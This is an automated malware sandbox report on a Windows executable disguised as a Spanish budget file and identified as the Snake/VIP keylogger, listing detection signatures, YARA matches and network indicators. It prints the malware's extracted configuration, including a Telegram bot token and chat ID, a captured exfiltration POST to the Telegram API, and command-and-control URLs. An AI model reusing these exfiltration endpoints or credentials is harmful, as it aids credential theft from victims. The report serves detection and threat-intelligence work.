Edit tour

Windows Analysis Report
PRESUPUESTO DE NOVIEMBRE...exe

Overview

General Information

Sample name:	PRESUPUESTO DE NOVIEMBRE...exe
Analysis ID:	1545933
MD5:	4cf66de9bfdf5bb65b4151f456db83df
SHA1:	8245fc47d7d1833882b90bbd1fe99d13b2335929
SHA256:	b07790927beaf1cc2d81cf76f0081c7c264c3133fe71437ca4bd26e220800d43
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PRESUPUESTO DE NOVIEMBRE...exe (PID: 1388 cmdline: "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe" MD5: 4CF66DE9BFDF5BB65B4151F456DB83DF)

PRESUPUESTO DE NOVIEMBRE...exe (PID: 7336 cmdline: "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe" MD5: 4CF66DE9BFDF5BB65B4151F456DB83DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat id": "8178506397", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8", "Chat_id": "8178506397", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d526:$a1: get_encryptedPassword 0x2d843:$a2: get_encryptedUsername 0x2d336:$a3: get_timePasswordChanged 0x2d43f:$a4: get_passwordField 0x2d53c:$a5: set_encryptedPassword 0x2ec25:$a7: get_logins 0x2eb88:$a10: KeyLoggerEventArgs 0x2e7ed:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x362ac6:$a1: get_encryptedPassword 0x3a5ce6:$a1: get_encryptedPassword 0x3e8d06:$a1: get_encryptedPassword 0x362de3:$a2: get_encryptedUsername 0x3a6003:$a2: get_encryptedUsername 0x3e9023:$a2: get_encryptedUsername 0x3628d6:$a3: get_timePasswordChanged 0x3a5af6:$a3: get_timePasswordChanged 0x3e8b16:$a3: get_timePasswordChanged 0x3629df:$a4: get_passwordField 0x3a5bff:$a4: get_passwordField 0x3e8c1f:$a4: get_passwordField 0x362adc:$a5: set_encryptedPassword 0x3a5cfc:$a5: set_encryptedPassword 0x3e8d1c:$a5: set_encryptedPassword 0x3641c5:$a7: get_logins 0x3a73e5:$a7: get_logins 0x3ea405:$a7: get_logins 0x364128:$a10: KeyLoggerEventArgs 0x3a7348:$a10: KeyLoggerEventArgs 0x3ea368:$a10: KeyLoggerEventArgs
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x44beb:$a1: get_encryptedPassword 0x44e25:$a2: get_encryptedUsername 0x44a18:$a3: get_timePasswordChanged 0x44b15:$a4: get_passwordField 0x44c01:$a5: set_encryptedPassword 0x46b6e:$a7: get_logins 0x46ae6:$a10: KeyLoggerEventArgs 0x4687c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22058:$a1: get_encryptedPassword 0x2236b:$a2: get_encryptedUsername 0x21e72:$a3: get_timePasswordChanged 0x21f7b:$a4: get_passwordField 0x2206e:$a5: set_encryptedPassword 0x2451a:$a7: get_logins 0x2447d:$a10: KeyLoggerEventArgs 0x240e6:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d726:$a1: get_encryptedPassword 0x2da43:$a2: get_encryptedUsername 0x2d536:$a3: get_timePasswordChanged 0x2d63f:$a4: get_passwordField 0x2d73c:$a5: set_encryptedPassword 0x2ee25:$a7: get_logins 0x2ed88:$a10: KeyLoggerEventArgs 0x2e9ed:$a11: KeyLoggerEventArgsEventHandler
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b926:$a1: get_encryptedPassword 0x2bc43:$a2: get_encryptedUsername 0x2b736:$a3: get_timePasswordChanged 0x2b83f:$a4: get_passwordField 0x2b93c:$a5: set_encryptedPassword 0x2d025:$a7: get_logins 0x2cf88:$a10: KeyLoggerEventArgs 0x2cbed:$a11: KeyLoggerEventArgsEventHandler
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39735:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38dd8:$a3: \Google\Chrome\User Data\Default\Login Data 0x39035:$a4: \Orbitum\User Data\Default\Login Data 0x39a14:$a5: \Kometa\User Data\Default\Login Data
5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b535:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abd8:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae35:$a4: \Orbitum\User Data\Default\Login Data 0x3b814:$a5: \Kometa\User Data\Default\Login Data
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c58d:$s1: UnHook 0x2c594:$s2: SetHook 0x2c59c:$s3: CallNextHook 0x2c5a9:$s4: _hook
5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e38d:$s1: UnHook 0x2e394:$s2: SetHook 0x2e39c:$s3: CallNextHook 0x2e3a9:$s4: _hook
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb2546:$a1: get_encryptedPassword 0xf5766:$a1: get_encryptedPassword 0x138786:$a1: get_encryptedPassword 0xb2863:$a2: get_encryptedUsername 0xf5a83:$a2: get_encryptedUsername 0x138aa3:$a2: get_encryptedUsername 0xb2356:$a3: get_timePasswordChanged 0xf5576:$a3: get_timePasswordChanged 0x138596:$a3: get_timePasswordChanged 0xb245f:$a4: get_passwordField 0xf567f:$a4: get_passwordField 0x13869f:$a4: get_passwordField 0xb255c:$a5: set_encryptedPassword 0xf577c:$a5: set_encryptedPassword 0x13879c:$a5: set_encryptedPassword 0xb3c45:$a7: get_logins 0xf6e65:$a7: get_logins 0x139e85:$a7: get_logins 0xb3ba8:$a10: KeyLoggerEventArgs 0xf6dc8:$a10: KeyLoggerEventArgs 0x139de8:$a10: KeyLoggerEventArgs
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb31ad:$s1: UnHook 0xf63cd:$s1: UnHook 0x1393ed:$s1: UnHook 0xb31b4:$s2: SetHook 0xf63d4:$s2: SetHook 0x1393f4:$s2: SetHook 0xb31bc:$s3: CallNextHook 0xf63dc:$s3: CallNextHook 0x1393fc:$s3: CallNextHook 0xb31c9:$s4: _hook 0xf63e9:$s4: _hook 0x139409:$s4: _hook
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d726:$a1: get_encryptedPassword 0x70946:$a1: get_encryptedPassword 0xb3966:$a1: get_encryptedPassword 0x2da43:$a2: get_encryptedUsername 0x70c63:$a2: get_encryptedUsername 0xb3c83:$a2: get_encryptedUsername 0x2d536:$a3: get_timePasswordChanged 0x70756:$a3: get_timePasswordChanged 0xb3776:$a3: get_timePasswordChanged 0x2d63f:$a4: get_passwordField 0x7085f:$a4: get_passwordField 0xb387f:$a4: get_passwordField 0x2d73c:$a5: set_encryptedPassword 0x7095c:$a5: set_encryptedPassword 0xb397c:$a5: set_encryptedPassword 0x2ee25:$a7: get_logins 0x72045:$a7: get_logins 0xb5065:$a7: get_logins 0x2ed88:$a10: KeyLoggerEventArgs 0x71fa8:$a10: KeyLoggerEventArgs 0xb4fc8:$a10: KeyLoggerEventArgs
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b535:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e755:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc1775:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3abd8:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ddf8:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0e18:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ae35:$a4: \Orbitum\User Data\Default\Login Data 0x7e055:$a4: \Orbitum\User Data\Default\Login Data 0xc1075:$a4: \Orbitum\User Data\Default\Login Data 0x3b814:$a5: \Kometa\User Data\Default\Login Data 0x7ea34:$a5: \Kometa\User Data\Default\Login Data 0xc1a54:$a5: \Kometa\User Data\Default\Login Data
2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e38d:$s1: UnHook 0x715ad:$s1: UnHook 0xb45cd:$s1: UnHook 0x2e394:$s2: SetHook 0x715b4:$s2: SetHook 0xb45d4:$s2: SetHook 0x2e39c:$s3: CallNextHook 0x715bc:$s3: CallNextHook 0xb45dc:$s3: CallNextHook 0x2e3a9:$s4: _hook 0x715c9:$s4: _hook 0xb45e9:$s4: _hook
2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x137366:$a1: get_encryptedPassword 0x17a586:$a1: get_encryptedPassword 0x1bd5a6:$a1: get_encryptedPassword 0x137683:$a2: get_encryptedUsername 0x17a8a3:$a2: get_encryptedUsername 0x1bd8c3:$a2: get_encryptedUsername 0x137176:$a3: get_timePasswordChanged 0x17a396:$a3: get_timePasswordChanged 0x1bd3b6:$a3: get_timePasswordChanged 0x13727f:$a4: get_passwordField 0x17a49f:$a4: get_passwordField 0x1bd4bf:$a4: get_passwordField 0x13737c:$a5: set_encryptedPassword 0x17a59c:$a5: set_encryptedPassword 0x1bd5bc:$a5: set_encryptedPassword 0x138a65:$a7: get_logins 0x17bc85:$a7: get_logins 0x1beca5:$a7: get_logins 0x1389c8:$a10: KeyLoggerEventArgs 0x17bbe8:$a10: KeyLoggerEventArgs 0x1bec08:$a10: KeyLoggerEventArgs
2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137fcd:$s1: UnHook 0x17b1ed:$s1: UnHook 0x1be20d:$s1: UnHook 0x137fd4:$s2: SetHook 0x17b1f4:$s2: SetHook 0x1be214:$s2: SetHook 0x137fdc:$s3: CallNextHook 0x17b1fc:$s3: CallNextHook 0x1be21c:$s3: CallNextHook 0x137fe9:$s4: _hook 0x17b209:$s4: _hook 0x1be229:$s4: _hook
Click to see the 27 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:35:19.059975+0100	2803305	3	Unknown Traffic	192.168.2.11	49780	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:35:17.072079+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49708	132.226.247.73	80	TCP
2024-10-31T10:35:18.353340+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49708	132.226.247.73	80	TCP
2024-10-31T10:35:19.946064+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49786	132.226.247.73	80	TCP

HTTP traffic detected: POST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54Host: api.telegram.orgContent-Length: 578

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 31 Oct 2024 09:35:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PRESUPUESTO DE NOVIEMBRE...exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB_q
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77
